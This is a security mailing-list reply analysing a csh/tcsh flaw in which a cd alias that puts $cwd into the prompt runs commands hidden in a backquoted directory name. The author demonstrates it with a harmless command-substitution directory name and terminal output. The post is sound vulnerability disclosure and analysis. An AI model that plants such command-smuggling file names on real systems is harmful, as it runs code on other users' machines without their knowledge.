Re: tee see shell problems

[szabo_p () maths su oz au (Paul Szabo)]

> A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
> out with BSDI anyway.) that allows the execution of arbitrary commands
> when changing into directories that are enclosed with back tic's.

It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):

tmp% pwd
/tmp
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
total 1
drwx------   2 psz      system       512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
total 0
-rw-------   1 psz      system         0 Sep 18 10:28 silly

Paul Szabo - System Manager   //        School of Mathematics and Statistics
psz () maths usyd edu au         //   University of Sydney, NSW 2006, Australia